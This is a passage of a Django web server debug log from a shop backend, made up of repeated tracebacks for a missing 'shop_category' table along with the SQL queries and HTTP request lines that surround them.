"/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:59:37] "GET / HTTP/1.0" 500 196472 DEBUG 2019-11-28 14:00:32,209 utils 18022 140356174259968 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:00:32.201150+00:00'::timestamptz AND "django_session"."session_key" = 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2'); args=(datetime.datetime(2019, 11, 28, 14, 0, 32, 201150, tzinfo=), 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2') DEBUG 2019-11-28 14:00:32,214 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 14:00:32,241 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 14:00:32,242 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,244 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,245 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,246 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,247 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,248 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,249 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,250 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,251 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,252 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,254 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,255 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,256 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,257 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,258 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,259 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,260 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,260 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,261 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:32,262 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 14:00:32] "GET / HTTP/1.0" 500 198334 DEBUG 2019-11-28 14:00:42,967 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 14:00:43,019 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 14:00:43,020 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,022 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,023 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,024 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,025 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,026 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,028 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,029 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,031 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,035 utils 18022 140356174259968 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,039 utils 18022 140356174259968 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,041 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,042 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,043 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,045 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Not Found: /robots.txt DEBUG 2019-11-28 14:00:43,049 utils 18022 140356174259968 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,051 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,052 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() [28/Nov/2019 14:00:43] "GET /robots.txt HTTP/1.0" 404 3799 DEBUG 2019-11-28 14:00:43,053 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:43,054 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 14:00:43] "GET / HTTP/1.0" 500 197393 Not Found: /favicon.ico [28/Nov/2019 14:00:44] "GET /favicon.ico HTTP/1.0" 404 3802 DEBUG 2019-11-28 14:00:46,405 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 14:00:46,455 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 14:00:46,457 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,459 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,460 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,462 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,463 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,464 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,466 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,467 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,469 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,470 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,472 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,474 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,475 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,477 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,478 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,479 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,481 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,482 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,483 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:46,484 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", 